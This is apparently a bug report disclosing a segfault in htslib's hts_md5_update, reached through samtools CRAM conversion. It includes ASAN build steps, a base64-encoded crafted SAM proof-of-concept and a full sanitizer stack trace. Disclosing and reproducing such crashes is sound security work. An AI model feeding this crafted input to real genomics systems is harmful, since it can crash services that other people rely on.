Summary
Segfault in hts_md5_update during parsing of a crafted SAM/FASTA file pair.
Environment
Built using LLVM 14 with ASAN on Ubuntu 22.04
How to reproduce
Build with ASAN on latest commit like so:
git clone --recursive https://github.com/samtools/htslib
cd htslib
autoreconf -i
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g" CXXFLAGS="-fsanitize=address -g" LDFLAGS="-fsanitize=address -g" ./configure
make -j$(nproc)
git clone --recursive https://github.com/samtools/samtools
cd samtools
autoheader
autoconf -Wno-syntax
CC=clang-14 CXX=clang++-14 CFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" CXXFLAGS="-fsanitize=address -g -I$(pwd)/../htslib" LDFLAGS="-fsanitize=address -g -L$(pwd)/../htslib" ./configure
make -j$(nproc)
Within the samtools folder, get poc file and reproduce with:
echo -ne "QFNRCVNOOmMxCUxOOjEwCnMwCTAJYzEJMTAwMDAwMDAwMDAwCTAJKjAJQTFDQ0dDR0dUVDEJMgkw
CTENTQkqCTAqKkNDQ0NYUEP/ZEJDSEMqKgoqUQlTATpjMQlMTjoxMApzMAkwCWMxCTEJMAkqMAlB
MUNDR0NHR1RUGQkyCTAJMQ1NCSoKczAJMAljMQkxCTAJKjAJQTFDQ0dDR0dUVDEJMgkwCTFRCVNO
OmMxCUxOOjEwCnMwCTAJYzEJMQkwCSowCUExQ0NHQ0dHVFQZCTIJMCoqCg==" | base64 -d > poc
./samtools view -C -T ../htslib/test/c2.fa poc
Which on my setup outputs:
[W::cram_get_ref] Reference file given, but ref 'c1' not present
[W::cram_get_ref] Failed to populate reference for id 0
[W::cram_write_SAM_hdr] No M5 tags present and could not find reference
[W::cram_write_SAM_hdr] Enabling embed_ref=2 option
[W::cram_write_SAM_hdr] NOTE: the CRAM file will be bigger than using an external reference
CRAM-�\��vvr@SQ SN:c1 LN:10
@PG ID:samtools PN:samtools VN:1.18-21-g528e1b2 CL:./samtools view -C -T ../htslib/test/c2.fa poc
� �??}�Y�[W::sam_parse1] mapped query must have a CIGAR; treated as unmapped
[W::sam_parse1] unrecognized mate reference name "A1CCGCGGTT1"; treated as unmapped
[W::sam_read1_sam] Parse error at line 3
AddressSanitizer:DEADLYSIGNAL
=================================================================
==11502==ERROR: AddressSanitizer: SEGV on unknown address 0x61a700001980 (pc 0x7f43074c49bf bp 0x7ffca087c6c0 sp 0x7ffca087be88 T0)
==11502==The signal is caused by a READ memory access.
#0 0x7f43074c49bf string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:370
#1 0x559b356add81 in __asan_memcpy (/home/octavio/samtools/samtools+0x132d81) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
#2 0x559b359c13e9 in hts_md5_update /home/octavio/htslib/md5.c:268:2
#3 0x559b35a7fcbd in cram_encode_container /home/octavio/htslib/cram/cram_encode.c:2041:17
#4 0x559b35aef96c in cram_flush_container /home/octavio/htslib/cram/cram_io.c:4128:14
#5 0x559b35af0795 in cram_flush_container_mt /home/octavio/htslib/cram/cram_io.c:4280:16
#6 0x559b35afb742 in cram_flush /home/octavio/htslib/cram/cram_io.c:5431:19
#7 0x559b3598a2e7 in hts_flush /home/octavio/htslib/hts.c:1667:16
#8 0x559b35903084 in vprint_error_core /home/octavio/samtools/sam_utils.c:48:26
#9 0x559b3590345c in print_error_errno /home/octavio/samtools/sam_utils.c:71:5
#10 0x559b3570c472 in stream_view /home/octavio/samtools/sam_view.c:762:9
#11 0x559b35707be8 in main_samview /home/octavio/samtools/sam_view.c:1363:15
#12 0x559b35786eed in main /home/octavio/samtools/bamtk.c:244:55
#13 0x7f4307429d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#14 0x7f4307429e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#15 0x559b3562bb24 in _start (/home/octavio/samtools/samtools+0xb0b24) (BuildId: 7078ea94d4e08689f85e1df47e2d609c021d2440)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV string/../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:370
==11502==ABORTING
Summary
Segfault in
hts_md5_updateduring parsing of a crafted SAM/FASTA file pair.Environment
Built using LLVM 14 with ASAN on Ubuntu 22.04
How to reproduce
Build with ASAN on latest commit like so:
Within the samtools folder, get poc file and reproduce with:
Which on my setup outputs: